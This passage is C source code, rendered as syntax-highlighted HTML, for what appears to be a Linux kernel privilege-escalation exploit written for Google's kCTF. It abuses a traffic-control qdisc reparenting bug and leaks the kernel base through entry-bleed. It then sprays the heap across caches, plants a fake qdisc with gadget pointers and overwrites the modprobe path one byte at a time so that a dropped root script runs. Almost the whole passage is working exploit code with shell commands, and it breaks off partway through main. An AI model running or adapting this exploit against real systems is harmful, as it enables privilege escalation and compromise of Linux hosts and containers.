                        <span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_WRITE</span><span class="p">],</span>
                        <span class="n">g_class</span> <span class="o">+</span> <span class="n">bytes_written</span><span class="p">,</span>
                        <span class="mi">128</span> <span class="o">-</span> <span class="n">bytes_written</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">perror</span><span class="p">(</span><span class="s">"write failed"</span><span class="p">);</span>
                    <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="n">bytes_written</span> <span class="o">+=</span> <span class="n">ret</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>


<span class="c1">// Fake qdisc data</span>
<span class="kt">uint8_t</span> <span class="n">g_qdisc</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Send controlled data to deducible address in kernel from kernel base</span>
<span class="kt">void</span> <span class="nf">fill_kernfs_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create a lockfile that we can actually use</span>
    <span class="n">setenv</span><span class="p">(</span><span class="s">"XTABLES_LOCKFILE"</span><span class="p">,</span> <span class="s">"/tmp/xtables.lock"</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>

    <span class="c1">// Redirect stdout and stderr to /dev/null</span>
    <span class="kt">int</span> <span class="n">devnull</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/null"</span><span class="p">,</span> <span class="n">O_WRONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">devnull</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">dup2</span><span class="p">(</span><span class="n">devnull</span><span class="p">,</span> <span class="n">STDOUT_FILENO</span><span class="p">);</span>
    <span class="n">dup2</span><span class="p">(</span><span class="n">devnull</span><span class="p">,</span> <span class="n">STDERR_FILENO</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">devnull</span><span class="p">);</span>

    <span class="c1">// Execute iptables to fill buffer</span>
    <span class="n">execl</span><span class="p">(</span><span class="s">"./iptables.bin"</span><span class="p">,</span> <span class="s">"iptables"</span><span class="p">,</span> <span class="s">"-A"</span><span class="p">,</span> <span class="s">"OUTPUT"</span><span class="p">,</span> <span class="s">"-m"</span><span class="p">,</span> <span class="s">"cgroup"</span><span class="p">,</span> <span class="s">"--path"</span><span class="p">,</span>
        <span class="n">g_qdisc</span><span class="p">,</span> <span class="s">"-j"</span><span class="p">,</span> <span class="s">"LOG"</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Check for NULL byte in u64</span>
<span class="kt">int</span> <span class="nf">has_null</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">val</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(((</span><span class="n">val</span> <span class="o">&gt;&gt;</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">))</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">setup_fake_qdisc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">num_complete</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set each one up with cyclical pattern for debugging</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_qdisc</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">4906</span> <span class="o">/</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ptr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">val</span><span class="p">;</span>
        <span class="n">val</span> <span class="o">+=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Fake &amp;qdisc-&gt;ops, set it kind of far into the kernfs_buf to avoid conflict</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">32</span><span class="p">;</span>

    <span class="c1">// Fake &amp;qdisc-&gt;ops-&gt;peek</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_write_gadget_addr</span><span class="p">;</span>

    <span class="c1">// The write address for the write gadget</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_write_target</span> <span class="o">+</span> <span class="n">num_complete</span><span class="p">;</span>

    <span class="c1">// Inside qdisc_dequeue_peeked, we do skb_peek(&amp;sch-&gt;gso_skb) and that</span>
    <span class="c1">// address has to point to itself, so make &amp;sch-&gt;gso_skb equal itself</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mh">0x88</span><span class="p">;</span>

    <span class="c1">// Place pointer to our return NULL gadget so that qdisc_dequeue_peeked</span>
    <span class="c1">// returns NULL</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_null_gadget_addr</span><span class="p">;</span>

    <span class="c1">// NULL gadget does `return dst-&gt;dev-&gt;mut` and dev happens to be the first</span>
    <span class="c1">// field, so set ours to a pointer that points to NULL (NULL happens later</span>
    <span class="c1">// in the kernfs_buf)</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">512</span><span class="p">;</span>

    <span class="c1">// These addresses cannot have a NULL in them or else our kernfs_buf gets</span>
    <span class="c1">// NULL terminated and we're out of luck</span>
    <span class="k">if</span> <span class="p">(</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">120</span><span class="p">)</span> <span class="o">||</span> 
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_write_gadget_addr</span><span class="p">)</span> <span class="o">||</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_write_target</span><span class="p">)</span>      <span class="o">||</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mh">0x88</span><span class="p">)</span>
        <span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"NULL ptr in these values: 0x%lx, 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">120</span><span class="p">,</span> <span class="n">g_write_gadget_addr</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Send kernfs data to the kernel</span>
<span class="kt">void</span> <span class="nf">send_kernfs_data</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"fork"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Child</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fill_kernfs_buf</span><span class="p">();</span> <span class="c1">// Doesn't return</span>
    <span class="p">}</span>

    <span class="c1">// Parent, wait for child to finish</span>
    <span class="kt">int</span> <span class="n">status</span><span class="p">;</span>
    <span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">status</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Trigger the bug</span>
<span class="kt">void</span> <span class="nf">trigger_bug</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Trigger bug and increment kernel value for /sbin/modeprobe overwrite</span>
<span class="kt">void</span> <span class="nf">increment_kernel_val</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">num_complete</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Reset the fake class data, because deficit changes each iteration</span>
    <span class="n">setup_fake_class</span><span class="p">();</span>

    <span class="c1">// Reset the fake qdisc data, we NULL out the field in the increment gadget</span>
    <span class="n">setup_fake_qdisc</span><span class="p">(</span><span class="n">num_complete</span><span class="p">);</span>

    <span class="c1">// Send the data to the kernel</span>
    <span class="n">send_kernfs_data</span><span class="p">();</span>

    <span class="c1">// Trigger the bug</span>
    <span class="n">trigger_bug</span><span class="p">();</span>
<span class="p">}</span>

<span class="c1">// Overwrite modprobe path</span>
<span class="kt">void</span> <span class="nf">overwrite_modprobe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// We have an increment gadget as our write primitive. This means we'll </span>
    <span class="c1">// target each byte of /sbin/modprobe at a time and increment that byte</span>
    <span class="c1">// until it's the right value. We start here: /'s'bin/modprobe. The way</span>
    <span class="c1">// that I decided to do this was to simply encode the logic in this function</span>
    <span class="c1">// by simulating each write as we do it in the kernel and then we can</span>
    <span class="c1">// check in the program if we're done or not. So let's setup our simulated</span>
    <span class="c1">// values:</span>
    <span class="c1">// </span>
    <span class="c1">// What we're starting with</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="n">sim_start</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/sbin/modprobe"</span><span class="p">;</span>

    <span class="c1">// What our goal is</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="n">sim_goal</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/proc/500/fd/3"</span><span class="p">;</span>

    <span class="c1">// Buffer to simulate writes</span>
    <span class="kt">uint8_t</span> <span class="n">sim_modprobe</span><span class="p">[</span><span class="mi">128</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">sim_modprobe</span><span class="p">,</span> <span class="n">sim_start</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sim_start</span><span class="p">));</span>

    <span class="c1">// What we're targeting right now. We start at offset 1 because '/' already</span>
    <span class="c1">// works for us</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">sim_write_target</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">sim_modprobe</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Iterate until the memory is identical</span>
    <span class="kt">size_t</span> <span class="n">num_complete</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int64_t</span> <span class="o">*</span><span class="n">write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">sim_write_target</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">sim_goal</span><span class="p">,</span> <span class="n">sim_modprobe</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sim_goal</span><span class="p">)))</span> <span class="p">{</span>
        <span class="c1">// Iterate until the character matches</span>
        <span class="k">while</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">sim_write_target</span><span class="p">,</span> <span class="n">sim_goal</span> <span class="o">+</span> <span class="n">num_complete</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="p">{</span>
            <span class="c1">// Increment the val and set it</span>
            <span class="kt">int64_t</span> <span class="n">curr_val</span> <span class="o">=</span> <span class="o">*</span><span class="n">write_ptr</span><span class="p">;</span>
            <span class="n">curr_val</span><span class="o">++</span><span class="p">;</span>
            <span class="o">*</span><span class="n">write_ptr</span> <span class="o">=</span> <span class="n">curr_val</span><span class="p">;</span>

            <span class="c1">// Increment the value in the kernel</span>
            <span class="n">increment_kernel_val</span><span class="p">(</span><span class="n">num_complete</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// This character matches, move to the next character</span>
        <span class="n">sim_write_target</span><span class="o">++</span><span class="p">;</span>
        <span class="n">write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">sim_write_target</span><span class="p">;</span>
        <span class="n">num_complete</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define BUFFER_SIZE 1024
</span>
<span class="c1">// What children do</span>
<span class="kt">void</span> <span class="nf">child_func</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Open the privesc script</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"privesc.sh"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Got the wrong fd for privesc.sh</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="n">BUFFER_SIZE</span><span class="p">];</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span><span class="p">;</span>

    <span class="c1">// Block until there's data to read from stdin</span>
    <span class="k">while</span> <span class="p">((</span><span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">)))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="n">STDOUT_FILENO</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">bytes_read</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Handle possible read errors</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"read"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Exit</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// How many child processes we spawn</span>
<span class="cp">#define NUM_CHILDS 500UL
</span>
<span class="c1">// Spray children processes so we have a predictable pid in the container</span>
<span class="kt">void</span> <span class="nf">spray_children</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_CHILDS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"fork"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Child</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">child_func</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Drop scripts to disk</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Dropping scripts...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"printf '</span><span class="se">\xff\xff\xff\xff</span><span class="s">' &gt; trigger.sh"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo '#!/bin/bash' &gt; privesc.sh"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo 'cat /flag &gt; /proc/500/fd/0' &gt;&gt; privesc.sh"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"chmod +x trigger.sh privesc.sh"</span><span class="p">);</span>

    <span class="c1">// Spray children processes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Spraying child pids...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">spray_children</span><span class="p">();</span>

    <span class="c1">// Check kernel version</span>
    <span class="kt">int</span> <span class="n">major</span> <span class="o">=</span> <span class="n">get_kernel_version</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">major</span> <span class="o">!=</span> <span class="mi">5</span> <span class="o">&amp;&amp;</span> <span class="n">major</span> <span class="o">!=</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Wrong kernel version</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set offsets for kernel 5</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">major</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="n">kernfs_addr_off_5</span><span class="p">;</span>
        <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="n">entry_syscall_off_5</span><span class="p">;</span>
        <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="n">write_gadget_off_5</span><span class="p">;</span>
        <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="n">modprobe_off_5</span><span class="p">;</span>
        <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="n">null_gadget_off_5</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set offsets for kernel 6</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="n">kernfs_addr_off_6</span><span class="p">;</span>
        <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="n">entry_syscall_off_6</span><span class="p">;</span>
        <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="n">write_gadget_off_6</span><span class="p">;</span>
        <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="n">modprobe_off_6</span><span class="p">;</span>
        <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="n">null_gadget_off_6</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Make sure we have the files we need, this is just for my lab not kCTF</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/tc.bin /tmp/tc.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/ip.bin /tmp/ip.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/socat.bin /tmp/socat.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/iptables.bin /tmp/iptables.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_files</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">required_files</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">F_OK</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"%s did not exist, exiting...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">required_files</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Determine scan start and scan end</span>
    <span class="kt">uint64_t</span> <span class="n">scan_start</span> <span class="o">=</span> <span class="n">KERNEL_LOWER_BOUND</span> <span class="o">+</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">scan_end</span> <span class="o">=</span> <span class="n">KERNEL_UPPER_BOUND</span> <span class="o">+</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>

    <span class="c1">// Attempt to entry bleed the kernel base</span>
    <span class="n">g_kernel_base</span> <span class="o">=</span> <span class="n">leak_syscall_entry</span><span class="p">(</span><span class="n">scan_start</span><span class="p">,</span> <span class="n">scan_end</span><span class="p">)</span> <span class="o">-</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Kernel base address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_kernel_base</span><span class="p">);</span>

    <span class="c1">// Update kernfs addr</span>
    <span class="n">g_kernfs_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Kernfs buffer address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_kernfs_addr</span><span class="p">);</span>

    <span class="c1">// Update arb write gadget</span>
    <span class="n">g_write_gadget_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Arbitrary write gadget address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_write_gadget_addr</span><span class="p">);</span>

    <span class="c1">// Update modprobe</span>
    <span class="n">g_modprobe_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Modprobe path address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_modprobe_addr</span><span class="p">);</span>

    <span class="c1">// Initialize the write target, we have to add 1 because /sbin/modprobe</span>
    <span class="c1">// already contains a '/' leading character that we'll retain</span>
    <span class="n">g_write_target</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_modprobe_addr</span> <span class="o">-</span> <span class="n">WRITE_TARGET_OFFSET</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Update NULL gadget</span>
    <span class="n">g_null_gadget_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Return NULL gadget address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_null_gadget_addr</span><span class="p">);</span>

    <span class="c1">// Get CAPs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Doing the unshare...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">unshare_stuff</span><span class="p">();</span>

    <span class="c1">// Pin our process</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Pinning our process to core-0...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">pin_to_core_0</span><span class="p">();</span>

    <span class="c1">// Setup listener</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Starting UDP listener...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">start_udp_listener</span><span class="p">();</span>

    <span class="c1">// Allocate pipes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating pipes...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">allocate_pipes</span><span class="p">();</span>

    <span class="c1">// Allocate classes 1:1 and 1:3 and give them qdiscs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Setting up initial classes...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">setup_classes</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_1</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 2</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_2</span><span class="p">();</span>

    <span class="c1">// Allocate the victim class</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Allocating victim class 1:2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:2 drr"</span><span class="p">);</span>

    <span class="c1">// Execute the bug to re-parent 1:3's qdisc to 1:2</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing bug to reparent qdisc to 1:2 from 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc replace dev lo parent 1:2 handle 3:0"</span><span class="p">);</span>

    <span class="c1">// Display the setup</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Displaying hierarchy setup...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class ls dev lo"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc ls"</span><span class="p">);</span>

    <span class="c1">// Enqueue packets in 1:1 and 1:2 qdiscs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Enqueueing packets in 1:1 and 1:2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))"</span><span class="p">);</span>

